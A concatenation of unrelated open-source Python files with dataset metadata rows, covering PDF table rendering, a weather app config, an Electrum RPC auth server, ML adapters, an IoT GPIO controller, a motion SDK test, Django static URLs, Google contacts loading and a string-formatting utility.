def add_empty(self, x, y):
self.span.append((x, y))
def get_data(self):
data = self.data
for x, y in self.span:
try:
data[y].insert(x, '')
except:
pass
return data
def add_cell_styles(self, c, begin, end, mode="td"):
def getColor(a, b):
return a
self.mode = mode.upper()
if c.frag.backColor and mode != "tr": # XXX Stimmt das so?
self.add_style(('BACKGROUND', begin, end, c.frag.backColor))
# print 'BACKGROUND', begin, end, c.frag.backColor
if 0:
log.debug("%r", (
begin,
end,
c.frag.borderTopWidth,
c.frag.borderTopStyle,
c.frag.borderTopColor,
c.frag.borderBottomWidth,
c.frag.borderBottomStyle,
c.frag.borderBottomColor,
c.frag.borderLeftWidth,
c.frag.borderLeftStyle,
c.frag.borderLeftColor,
c.frag.borderRightWidth,
c.frag.borderRightStyle,
c.frag.borderRightColor,
))
if getBorderStyle(c.frag.borderTopStyle) and c.frag.borderTopWidth and c.frag.borderTopColor is not None:
self.add_style(('LINEABOVE', begin, (end[0], begin[1]),
c.frag.borderTopWidth,
c.frag.borderTopColor,
"squared"))
if getBorderStyle(c.frag.borderLeftStyle) and c.frag.borderLeftWidth and c.frag.borderLeftColor is not None:
self.add_style(('LINEBEFORE', begin, (begin[0], end[1]),
c.frag.borderLeftWidth,
c.frag.borderLeftColor,
"squared"))
if getBorderStyle(c.frag.borderRightStyle) and c.frag.borderRightWidth and c.frag.borderRightColor is not None:
self.add_style(('LINEAFTER', (end[0], begin[1]), end,
c.frag.borderRightWidth,
c.frag.borderRightColor,
"squared"))
if getBorderStyle(c.frag.borderBottomStyle) and c.frag.borderBottomWidth and c.frag.borderBottomColor is not None:
self.add_style(('LINEBELOW', (begin[0], end[1]), end,
c.frag.borderBottomWidth,
c.frag.borderBottomColor,
"squared"))
self.add_style(('LEFTPADDING', begin, end, c.frag.paddingLeft or self.padding))
self.add_style(('RIGHTPADDING', begin, end, c.frag.paddingRight or self.padding))
self.add_style(('TOPPADDING', begin, end, c.frag.paddingTop or self.padding))
self.add_style(('BOTTOMPADDING', begin, end, c.frag.paddingBottom or self.padding))
class pisaTagTABLE(pisaTag):
def start(self, c):
c.addPara()
attrs = self.attr
# Swap table data
c.tableData, self.tableData = TableData(), c.tableData
tdata = c.tableData
# border
#tdata.border = attrs.border
#tdata.bordercolor = attrs.bordercolor
begin = (0, 0)
end = (-1, - 1)
if attrs.border and attrs.bordercolor:
frag = c.frag
frag.borderLeftWidth = attrs.border
frag.borderLeftColor = attrs.bordercolor
frag.borderLeftStyle = "solid"
frag.borderRightWidth = attrs.border
frag.borderRightColor = attrs.bordercolor
frag.borderRightStyle = "solid"
frag.borderTopWidth = attrs.border
frag.borderTopColor = attrs.bordercolor
frag.borderTopStyle = "solid"
frag.borderBottomWidth = attrs.border
frag.borderBottomColor = attrs.bordercolor
frag.borderBottomStyle = "solid"
# tdata.add_style(("GRID", begin, end, attrs.border, attrs.bordercolor))
tdata.padding = attrs.cellpadding
#if 0: #attrs.cellpadding:
# tdata.add_style(('LEFTPADDING', begin, end, attrs.cellpadding))
# tdata.add_style(('RIGHTPADDING', begin, end, attrs.cellpadding))
# tdata.add_style(('TOPPADDING', begin, end, attrs.cellpadding))
# tdata.add_style(('BOTTOMPADDING', begin, end, attrs.cellpadding))
# alignment
#~ tdata.add_style(('VALIGN', (0,0), (-1,-1), attrs.valign.upper()))
# Set Border and padding styles
tdata.add_cell_styles(c, (0, 0), (-1, - 1), "table")
# bgcolor
#if attrs.bgcolor is not None:
# tdata.add_style(('BACKGROUND', (0, 0), (-1, -1), attrs.bgcolor))
tdata.align = attrs.align.upper()
tdata.col = 0
tdata.row = 0
tdata.colw = []
tdata.rowh = []
tdata.repeat = attrs.repeat
tdata.width = _width(attrs.width)
# self.tabdata.append(tdata)
def end(self, c):
tdata = c.tableData
data = tdata.get_data()
# Add missing columns so that each row has the same count of columns
# This prevents errors in Reportlab table
try:
maxcols = max([len(row) for row in data] or [0])
except ValueError:
log.warn(c.warning("<table> rows seem to be inconsistent"))
maxcols = [0]
for i, row in enumerate(data):
data[i] += [''] * (maxcols - len(row))
try:
if tdata.data:
# log.debug("Table sryles %r", tdata.styles)
t = PmlTable(
data,
colWidths=tdata.colw,
rowHeights=tdata.rowh,
# totalWidth = tdata.width,
splitByRow=1,
# repeatCols = 1,
repeatRows=tdata.repeat,
hAlign=tdata.align,
vAlign='TOP',
style=TableStyle(tdata.styles))
t.totalWidth = _width(tdata.width)
t.spaceBefore = c.frag.spaceBefore
t.spaceAfter = c.frag.spaceAfter
# XXX Maybe we need to copy some more properties?
t.keepWithNext = c.frag.keepWithNext
# t.hAlign = tdata.align
c.addStory(t)
else:
log.warn(c.warning("<table> is empty"))
except:
log.warn(c.warning("<table>"), exc_info=1)
# Cleanup and re-swap table data
c.clearFrag()
c.tableData, self.tableData = self.tableData, None
class pisaTagTR(pisaTag):
def start(self, c):
tdata = c.tableData
row = tdata.row
begin = (0, row)
end = (-1, row)
tdata.add_cell_styles(c, begin, end, "tr")
c.frag.vAlign = self.attr.valign or c.frag.vAlign
tdata.col = 0
tdata.data.append([])
def end(self, c):
c.tableData.row += 1
class pisaTagTD(pisaTag):
def start(self, c):
if self.attr.align is not None:
#print self.attr.align, getAlign(self.attr.align)
c.frag.alignment = getAlign(self.attr.align)
c.clearFrag()
self.story = c.swapStory()
# print "#", len(c.story)
attrs = self.attr
tdata = c.tableData
cspan = attrs.colspan
rspan = attrs.rowspan
row = tdata.row
col = tdata.col
while 1:
for x, y in tdata.span:
if x == col and y == row:
col += 1
tdata.col += 1
break
#cs = 0
#rs = 0
begin = (col, row)
end = (col, row)
if cspan:
end = (end[0] + cspan - 1, end[1])
if rspan:
end = (end[0], end[1] + rspan - 1)
if begin != end:
#~ print begin, end
tdata.add_style(('SPAN', begin, end))
for x in range(begin[0], end[0] + 1):
for y in range(begin[1], end[1] + 1):
if x != begin[0] or y != begin[1]:
tdata.add_empty(x, y)
# Set Border and padding styles
tdata.add_cell_styles(c, begin, end, "td")
# Calculate widths
# Add empty placeholders for new columns
if (col + 1) > len(tdata.colw):
tdata.colw = tdata.colw + ((col + 1 - len(tdata.colw)) * [_width()])
# Get value of with, if no spanning
if not cspan:
# print c.frag.width
width = c.frag.width or self.attr.width #self._getStyle(None, attrs, "width", "width", mode)
# If is value, the set it in the right place in the arry
# print width, _width(width)
if width is not None:
tdata.colw[col] = _width(width)
# Calculate heights
if row + 1 > len(tdata.rowh):
tdata.rowh = tdata.rowh + ((row + 1 - len(tdata.rowh)) * [_width()])
if not rspan:
height = None #self._getStyle(None, attrs, "height", "height", mode)
if height is not None:
tdata.rowh[row] = _width(height)
tdata.add_style(('FONTSIZE', begin, end, 1.0))
tdata.add_style(('LEADING', begin, end, 1.0))
# Vertical align
valign = self.attr.valign or c.frag.vAlign
if valign is not None:
tdata.add_style(('VALIGN', begin, end, valign.upper()))
# Reset border, otherwise the paragraph block will have borders too
frag = c.frag
frag.borderLeftWidth = 0
frag.borderLeftColor = None
frag.borderLeftStyle = None
frag.borderRightWidth = 0
frag.borderRightColor = None
frag.borderRightStyle = None
frag.borderTopWidth = 0
frag.borderTopColor = None
frag.borderTopStyle = None
frag.borderBottomWidth = 0
frag.borderBottomColor = None
frag.borderBottomStyle = None
def end(self, c):
tdata = c.tableData
c.addPara()
cell = c.story
# Handle empty cells, they otherwise collapse
#if not cell:
# cell = ' '
# Keep in frame if needed since Reportlab does no split inside of cells
if (not c.frag.insideStaticFrame) and (c.frag.keepInFrameMode is not None):
# tdata.keepinframe["content"] = cell
cell = PmlKeepInFrame(
maxWidth=0,
maxHeight=0,
mode=c.frag.keepInFrameMode,
content=cell)
c.swapStory(self.story)
tdata.add_cell(cell)
class pisaTagTH(pisaTagTD):
pass
'''
end_th = end_td
def start_keeptogether(self, attrs):
self.story.append([])
self.next_para()
def end_keeptogether(self):
if not self.story[-1]:
self.add_noop()
self.next_para()
s = self.story.pop()
self.add_story(KeepTogether(s))
def start_keepinframe(self, attrs):
self.story.append([])
self.keepinframe = {
"maxWidth": attrs["maxwidth"],
"maxHeight": attrs["maxheight"],
"mode": attrs["mode"],
"name": attrs["name"],
"mergeSpace": attrs["mergespace"]
}
# print self.keepinframe
self.next_para()
def end_keepinframe(self):
if not self.story[-1]:
self.add_noop()
self.next_para()
self.keepinframe["content"] = self.story.pop()
self.add_story(KeepInFrame(**self.keepinframe))
''' | mit | 3,694,893,880,446,124,500 | 32.439206 | 122 | 0.517475 | false | 3.857937 | false | false | false |
timevortexproject/timevortex | weather/utils/globals.py | 1 | 1404 | #!/usr/bin/python3
# -*- coding: utf8 -*-
# -*- Mode: Python; py-indent-offset: 4 -*-
"""Globals for weather app"""
from datetime import datetime, timedelta
from django.conf import settings
KEY_METEAR_NO_SITE_ID = "metear_no_site_id"
KEY_METEAR_BAD_URL = "metear_bad_url"
KEY_METEAR_PROBLEM_WS = "metear_problem_ws"
KEY_METEAR_BAD_CONTENT = "metear_bad_content"
KEY_METEAR_NO_START_DATE = "metear_no_start_date"
PROCESS_STOPPED = "Process stopped. Wait a minute before retrying."
ERROR_METEAR = {
KEY_METEAR_NO_SITE_ID: "No METEAR Site in database. %s" % PROCESS_STOPPED,
KEY_METEAR_BAD_URL: "Bad URL to target METEAR service. %s" % PROCESS_STOPPED,
KEY_METEAR_PROBLEM_WS: "METEAR Web service does not respond. %s" % PROCESS_STOPPED,
KEY_METEAR_BAD_CONTENT: "Bad content from METEAR Web service. %s" % PROCESS_STOPPED,
KEY_METEAR_NO_START_DATE: "No start date found in DB. %s" % PROCESS_STOPPED,
}
SETTINGS_METEAR_URL = "METEAR_URL"
SETTINGS_DEFAULT_METEAR_URL = "http://www.wunderground.com/history/airport/%s/%s/DailyHistory.html?format=1"
SETTINGS_STUBS_METEAR_URL = "%s%s" % (settings.SITE_URL, "/stubs/history/airport/%s/%s/DailyHistory.html?format=1")
SETTINGS_STUBS_NEW_METEAR_URL = "%s%s" % (
settings.SITE_URL, "/stubs/history/airport/%s/%s/NewDailyHistory.html?format=1")
SETTINGS_STUBS_METEAR_START_DATE = (datetime.today() - timedelta(days=3)).strftime("%Y/%m/%d")
| mit | -9,200,364,049,418,442,000 | 49.142857 | 115 | 0.712251 | false | 2.664137 | false | false | false |
cryptapus/electrum-myr | lib/jsonrpc.py | 1 | 3726 | #!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2018 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer, SimpleJSONRPCRequestHandler
from base64 import b64decode
import time
from . import util
class RPCAuthCredentialsInvalid(Exception):
def __str__(self):
return 'Authentication failed (bad credentials)'
class RPCAuthCredentialsMissing(Exception):
def __str__(self):
return 'Authentication failed (missing credentials)'
class RPCAuthUnsupportedType(Exception):
def __str__(self):
return 'Authentication failed (only basic auth is supported)'
# based on http://acooke.org/cute/BasicHTTPA0.html by andrew cooke
class VerifyingJSONRPCServer(SimpleJSONRPCServer):
def __init__(self, rpc_user, rpc_password, *args, **kargs):
self.rpc_user = rpc_user
self.rpc_password = rpc_password
class VerifyingRequestHandler(SimpleJSONRPCRequestHandler):
def parse_request(myself):
# first, call the original implementation which returns
# True if all OK so far
if SimpleJSONRPCRequestHandler.parse_request(myself):
try:
self.authenticate(myself.headers)
return True
except (RPCAuthCredentialsInvalid, RPCAuthCredentialsMissing,
RPCAuthUnsupportedType) as e:
myself.send_error(401, str(e))
except BaseException as e:
import traceback, sys
traceback.print_exc(file=sys.stderr)
myself.send_error(500, str(e))
return False
SimpleJSONRPCServer.__init__(
self, requestHandler=VerifyingRequestHandler, *args, **kargs)
def authenticate(self, headers):
if self.rpc_password == '':
# RPC authentication is disabled
return
auth_string = headers.get('Authorization', None)
if auth_string is None:
raise RPCAuthCredentialsMissing()
(basic, _, encoded) = auth_string.partition(' ')
if basic != 'Basic':
raise RPCAuthUnsupportedType()
encoded = util.to_bytes(encoded, 'utf8')
credentials = util.to_string(b64decode(encoded), 'utf8')
(username, _, password) = credentials.partition(':')
if not (util.constant_time_compare(username, self.rpc_user)
and util.constant_time_compare(password, self.rpc_password)):
time.sleep(0.050)
raise RPCAuthCredentialsInvalid()
| mit | 1,195,370,511,997,288,000 | 38.221053 | 91 | 0.665056 | false | 4.555012 | false | false | false |
google-research/google-research | ipagnn/adapters/gat_adapters.py | 1 | 2892 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Adapters for GAT models."""
import jax
import jax.numpy as jnp
from ipagnn.adapters import common_adapters
class GATAdapter(common_adapters.SequenceAdapter):
"""Adapter for GAT model."""
def as_example(self, dataset_item):
inputs = jax.tree_map(lambda x: x.numpy(), dataset_item)
example = {
'start_index': inputs['cfg']['start_index'],
'exit_index': inputs['cfg']['exit_index'],
'data': inputs['cfg']['data'],
'edge_types': inputs['cfg']['edge_types'],
'source_indices': inputs['cfg']['adjacency_list/source_indices'],
'dest_indices': inputs['cfg']['adjacency_list/dest_indices'],
'steps': inputs['cfg']['steps'],
'target_output': inputs['target_output'],
'target_output_length': inputs['target_output_length'],
'human_readable_target_output': inputs['human_readable_target_output'],
'human_readable_code': inputs['human_readable_code'],
}
if 'error_type' in inputs:
example['error_type'] = inputs['error_type']
return example
def get_train_inputs(self, example):
return {key: value for key, value in example.items()
if value.dtype != jnp.dtype('O')}
class GGNNAdapter(common_adapters.SequenceAdapter):
"""Adapter for GGNN model."""
def as_example(self, dataset_item):
inputs = jax.tree_map(lambda x: x.numpy(), dataset_item)
example = {
'start_index': inputs['cfg']['start_index'],
'exit_index': inputs['cfg']['exit_index'],
'data': inputs['cfg']['data'],
'edge_types': inputs['cfg']['edge_types'],
'source_indices': inputs['cfg']['adjacency_list/source_indices'],
'dest_indices': inputs['cfg']['adjacency_list/dest_indices'],
'steps': inputs['cfg']['steps'],
'target_output': inputs['target_output'],
'target_output_length': inputs['target_output_length'],
'human_readable_target_output': inputs['human_readable_target_output'],
'human_readable_code': inputs['human_readable_code'],
}
if 'error_type' in inputs:
example['error_type'] = inputs['error_type']
return example
def get_train_inputs(self, example):
return {key: value for key, value in example.items()
if value.dtype != jnp.dtype('O')}
| apache-2.0 | 6,610,926,958,701,834,000 | 37.56 | 79 | 0.651107 | false | 3.770535 | false | false | false |
sakthivigneshr/homeauto | src/control/rpi/rpi_gpio_slave.py | 1 | 1752 | import pika
import RPi.GPIO as GPIO
import paho.mqtt.client as mqtt
from threading import Thread
USER = "test"
PASS = "test123"
VHOST = "/cloudlynk"
HOST = "mohawk.link"
KEY = "solfeta"
XCHANGE = "home"
OUTPUT_PIN = 7
def callback(ch, method, properties, body):
level = int(body)
print("received msg: " + repr(level))
GPIO.output(OUTPUT_PIN, level)
def on_message(mqttc, app_data, msg):
level = int(msg.payload)
print "Received message " + repr(level)
GPIO.output(OUTPUT_PIN, level)
def on_connect(mqttc, app_data, flags, rc):
print "Connect successful"
mqttc.subscribe("control/lights/00")
class rabbitConnect(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
print "Starting RabbitMQ"
cred = pika.PlainCredentials(USER, PASS)
conn = pika.BlockingConnection(pika.ConnectionParameters(
host=HOST, virtual_host=VHOST, credentials=cred))
chan = conn.channel()
chan.exchange_declare(exchange=XCHANGE, type='topic')
rslt = chan.queue_declare(exclusive=True)
q = rslt.method.queue
chan.queue_bind(exchange=XCHANGE, queue=q, routing_key=KEY)
chan.basic_consume(callback, queue=q, no_ack=True)
chan.start_consuming()
class mqttConnect(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
print "Starting MQTT"
mqttc = mqtt.Client()
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.connect("mohawk.link", 1883, 60)
mqttc.loop_forever()
class main():
# Setup the pins
GPIO.setmode(GPIO.BOARD)
GPIO.setup(OUTPUT_PIN, GPIO.OUT)
myThreadObj1 = rabbitConnect()
myThreadObj1.start()
myThreadObj2 = mqttConnect()
myThreadObj2.start()
myThreadObj1.join()
myThreadObj2.join()
if __name__ == "__main__":
main()
| mit | 8,074,197,039,635,007,000 | 22.052632 | 61 | 0.694635 | false | 2.839546 | false | false | false |
jakublipinski/i2Gmail-Backup-macOS-Messages-To-Gmail | contacts.py | 1 | 2674 | import gdata.data
import gdata.contacts.client
import gdata.contacts.data
import string
import config
class Contacts:
def __init__(self, credentials):
auth2token = gdata.gauth.OAuth2Token(client_id=credentials.client_id,
client_secret=credentials.client_secret,
scope='https://www.google.com/m8/feeds/contacts/default/full',
access_token=credentials.id_token,
refresh_token=credentials.refresh_token,
user_agent=config.APPLICATION_NAME)
self.client = gdata.contacts.client.ContactsClient()
auth2token.authorize(self.client)
self.email_to_name = {}
self.phone_to_name = {}
def load_contacts(self):
max_results = 99999
start_index = 1
query = gdata.contacts.client.ContactsQuery()
query.max_results = max_results
query.start_index = start_index
feed = self.client.GetContacts(q=query)
while feed:
for i, entry in enumerate(feed.entry):
if entry.name:
full_name = entry.name.full_name.text
primary_email = None
for email_entry in entry.email:
email = email_entry.address.lower()
if email_entry.primary and email_entry.primary=="true":
primary_email = email
if email in self.email_to_name:
print(u"Email address: '{}' is assigned to both '{}' and '{}'!".\
format(email, self.email_to_name[email], full_name))
else:
self.email_to_name[email] = (full_name, u'%s <%s>' % (full_name, email))
for phone_number_entry in entry.phone_number:
phone_number = Contacts.strip_and_reverse_phone_number(phone_number_entry.text)
if phone_number in self.phone_to_name:
print("Phone number: '%s' is assigned to both '%s' and '%s'!"%
(phone_number_entry.text, self.phone_to_name[phone_number], full_name))
else:
if primary_email:
self.phone_to_name[phone_number] = (
full_name, u'%s <%s>' % (full_name, primary_email))
else:
self.phone_to_name[phone_number] = (full_name, u'%s <%s>' % (full_name, phone_number_entry.text))
next_link = feed.GetNextLink()
if next_link:
feed = self.client.GetContacts(uri=next_link.href)
else:
feed = None
def get_by_phone_number(self, phone_number):
phone_number = Contacts.strip_and_reverse_phone_number(phone_number)
return self.phone_to_name.get(phone_number)
def get_by_email(self, email):
email = email.lower()
return self.email_to_name.get(email)
@staticmethod
def strip_and_reverse_phone_number(phone_number):
number = ''.join(ch for ch in phone_number if ch.isdigit())
if len(number)<3:
return phone_number
number = number[-9:]
number = number[::-1]
return number
| mit | 2,101,036,142,555,594,800 | 32.012346 | 105 | 0.665669 | false | 3.098494 | false | false | false |
bmswgnp/sdk | python/test.py | 1 | 5131 | #
# Simple test program for the Python Motion SDK.
#
# @file tools/sdk/python/test.py
# @author Luke Tokheim, [email protected]
# @version 2.2
#
# Copyright (c) 2015, Motion Workshop
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import sys
from MotionSDK import *
PortPreview = 32079
PortSensor = 32078
PortRaw = 32077
PortConfigurable = 32076
PortConsole = 32075
NSample = 10
def test_Client(host, port):
client = Client(host, port)
print "Connected to " + str(host) + ":" + str(port)
xml_string = "<?xml version=\"1.0\"?><configurable><preview><Gq/></preview><sensor><a/></sensor></configurable>"
if client.writeData(xml_string):
print "Sent active channel definition to Configurable service"
if client.waitForData():
sample_count = 0
while sample_count < NSample:
data = client.readData()
if None == data:
break
if PortPreview == port:
container = Format.Preview(data)
for key in container:
q = container[key].getQuaternion(False)
print "q(" + str(key) + ") = (" + str(q[0]) + ", " + str(q[1]) + "i, " + str(q[2]) + "j, " + str(q[3]) + "k)"
if PortSensor == port:
container = Format.Sensor(data)
for key in container:
a = container[key].getAccelerometer()
print "a(" + str(key) + ") = (" + str(a[0]) + ", " + str(a[1]) + ", " + str(a[2]) + ") g"
if PortRaw == port:
container = Format.Raw(data)
for key in container:
a = container[key].getAccelerometer()
print "a(" + str(key) + ") = (" + str(a[0]) + ", " + str(a[1]) + ", " + str(a[2]) + ")"
if PortConfigurable == port:
container = Format.Configurable(data)
for key in container:
line = "data(" + str(key) + ") = ("
for i in range(container[key].size()):
if i > 0:
line += ", "
line += str(container[key].value(i))
line += ")"
print line
sample_count += 1
def test_LuaConsole(host, port):
client = Client(host, port)
print("Connected to " + str(host) + ":" + str(port))
#
# General Lua scripting interface.
#
lua_chunk = \
"if not node.is_reading() then" \
" node.close()" \
" node.scan()" \
" node.start()" \
" end" \
" if node.is_reading() then" \
" print('Reading from ' .. node.num_reading() .. ' device(s)')" \
" else" \
" print('Failed to start reading')" \
" end"
print LuaConsole.SendChunk(client, lua_chunk, 5)
# Scripting language compatibility class. Translate
# Python calls into Lua calls and send them to the
# console service.
node = LuaConsole.Node(client)
print "node.is_reading() = " + str(node.is_reading())
def test_File():
filename = "../../test_data/sensor.bin";
print "reading take data file: \"" + filename + "\""
take_file = File(filename)
while True:
data = take_file.readData(9, True)
if None == data:
break
print Format.SensorElement(data).getAccelerometer()
def main(argv):
# Set the default host name parameter. The SDK is
# socket based so any networked Motion Service is
# available.
host = ""
if len(argv) > 1:
host = argv[1]
test_LuaConsole(host, PortConsole)
test_Client(host, PortPreview)
test_Client(host, PortSensor)
test_Client(host, PortRaw)
test_Client(host, PortConfigurable)
test_File()
if __name__ == "__main__":
sys.exit(main(sys.argv))
| bsd-2-clause | 1,064,305,266,750,681,900 | 31.474684 | 129 | 0.588384 | false | 3.881241 | true | false | false |
bop/foundation | lib/python2.7/site-packages/staticfiles/urls.py | 1 | 1283 | import re
from django.conf import settings
from django.conf.urls.defaults import patterns, url
from django.core.exceptions import ImproperlyConfigured
urlpatterns = []
def static(prefix, view='django.views.static.serve', **kwargs):
"""
Helper function to return a URL pattern for serving files in debug mode.
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = patterns('',
# ... the rest of your URLconf goes here ...
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
"""
# No-op if not in debug mode or an non-local prefix
if not settings.DEBUG or (prefix and '://' in prefix):
return []
elif not prefix:
raise ImproperlyConfigured("Empty static prefix not permitted")
return patterns('',
url(r'^%s(?P<path>.*)$' % re.escape(prefix.lstrip('/')), view, kwargs=kwargs),
)
def staticfiles_urlpatterns(prefix=None):
"""
Helper function to return a URL pattern for serving static files.
"""
if prefix is None:
prefix = settings.STATIC_URL
return static(prefix, view='staticfiles.views.serve')
# Only append if urlpatterns are empty
if settings.DEBUG and not urlpatterns:
urlpatterns += staticfiles_urlpatterns()
| gpl-2.0 | 5,661,768,768,317,236,000 | 31.075 | 86 | 0.686672 | false | 4.29097 | false | false | false |
SKIRT/PTS | core/tools/stringify.py | 1 | 41185 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.tools.stringify Provides useful functions for converting objects of various types to strings.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import standard modules
import copy
import warnings
# Import the relevant PTS classes and modules
from . import types
from . import introspection
from . import sequences
from . import strings
from . import numbers
# -----------------------------------------------------------------
def tostr(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
# Get the 'scientific' flag
scientific = kwargs.get("scientific", None)
scientific_int = kwargs.pop("scientific_int", True) # also represent integers in scientific notation
# Set default number of decimal places
#decimal_places = kwargs.pop("decimal_places", None) # let it be done automatically in the str_from_... function
#print(str(value), "nd", decimal_places)
#ndigits = kwargs.pop("ndigits", None)
decimal_places = kwargs.get("decimal_places", None)
ndigits = kwargs.get("ndigits", None)
# Set scientific flag flexibly, if scientific flag was not passed explicitly
if scientific is None:
# Integer value
if (scientific_int and types.is_integer_type(value)) or (types.is_real_type(value) and numbers.is_integer(value)):
# Convert to be certain (if from float)
value = int(value)
#if -1e4 <= value <= 1e4: scientific = False
if -999 < value < 999:
scientific = False
if ndigits is None: decimal_places = 0
else: scientific = True
# No decimals for integers
#decimal_places = 0 YES: OF COURSE THERE MUST BE DECIMAL PLACES FOR SCIENTIFIC NOTATION
# Real value
elif types.is_real_type(value):
#if -1e4 <= value <= 1e4: scientific = False
if -999.99 < value < 999.99: scientific = False
else: scientific = True
# Quantity
elif introspection.lazy_isinstance(value, "Quantity", "astropy.units", return_false_if_fail=True):
if -999.99 < value.value < 999.99: scientific = False
else: scientific = True
elif introspection.lazy_isinstance(value, "QuantityRange", "pts.core.basics.range", return_false_if_fail=True):
if -999.99 < value.min.value and value.max.value < 999.99: scientific = False
else: scientific = True
elif introspection.lazy_isinstance(value, "RealRange", "pts.core.basics.range", return_false_if_fail=True):
if -999.99 < value.min and value.max < 999.99: scientific = False
else: scientific = True
elif introspection.lazy_isinstance(value, "IntegerRange", "pts.core.basics.range", return_false_if_fail=True):
if -999 < value.min and value.max < 999: scientific = False
else: scientific = True
# Other
else: scientific = False
#print("scien", scientific)
#print("dec", decimal_places)
#print("nd", ndigits)
# Set the options
kwargs["scientific"] = scientific
kwargs["decimal_places"] = decimal_places
kwargs["ndigits"] = ndigits
# Set scientific flag for integers
elif types.is_integer_type(value) or (types.is_real_type(value) and numbers.is_integer(value)):
if scientific:
# ONLY IF SCIENTIFIC_INT IS TRUE
if scientific_int:
# ONLY IF NECESSARY
if -999 < value < 999: scientific = False
else: scientific = True
# Don't apply 'scientific' to integers
else: scientific = False
# Set flag
kwargs["scientific"] = scientific
kwargs["ndigits"] = ndigits
# Stringify
return stringify(value, **kwargs)[1].strip()
# -----------------------------------------------------------------
def stringify(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
# List or derived from list
if isinstance(value, list): return stringify_list(value, **kwargs)
# Dictionary
if isinstance(value, dict): return stringify_dict(value, **kwargs)
# Array or derived from Array, but not quantity!
#elif isinstance(value, np.ndarray) and not isinstance(value, Quantity):
#elif introspection.try_importing_module("numpy", True) and (isinstance(value, np.ndarray) and not hasattr(value, "unit")):
# WE ALSO TEST IF THIS IS NOT A NUMPY INTEGER, FLOAT OR BOOLEAN (because they have a __array__ attribute)
elif types.is_array_like(value): return stringify_array(value, **kwargs)
# Column or masked masked column
elif types.is_astropy_column(value): return stringify_array(value, **kwargs)
# Tuple or derived from tuple
elif isinstance(value, tuple): return stringify_tuple(value, **kwargs)
# All other
#else: return stringify_not_list(value, scientific=scientific, decimal_places=decimal_places, fancy=fancy, ndigits=ndigits, unicode=unicode, **kwargs)
else: return stringify_not_list(value, **kwargs)
# -----------------------------------------------------------------
def get_parsing_type(value):
"""
This function ...
:param value:
:return:
"""
ptype, string = stringify(value)
return ptype
# -----------------------------------------------------------------
def can_get_item(value):
"""
This function ...
:param value:
:return:
"""
#print(value, type(value))
try:
length = len(value)
except TypeError: return False
if len(value) == 0: return True
else:
try:
item = value[0]
return True
except IndexError: return False
# -----------------------------------------------------------------
def get_strings(values, return_types=False, value_kwargs=None, add_quotes=False, quote_character="'"):
"""
This function ...
:param values:
:param return_types:
:param value_kwargs:
:param add_quotes:
:param quote_character:
:return:
"""
if value_kwargs is None: value_kwargs = {}
strings = []
ptype = None
ptypes = set()
# Loop over the values
for entry in values:
# parsetype, val = stringify_not_list(entry)
parsetype, val = stringify(entry, **value_kwargs)
# from ..basics.configuration import parent_type
# if add_quotes and parent_type(parsetype) == "string":
if add_quotes and types.is_string_type(entry): val = quote_character + val + quote_character
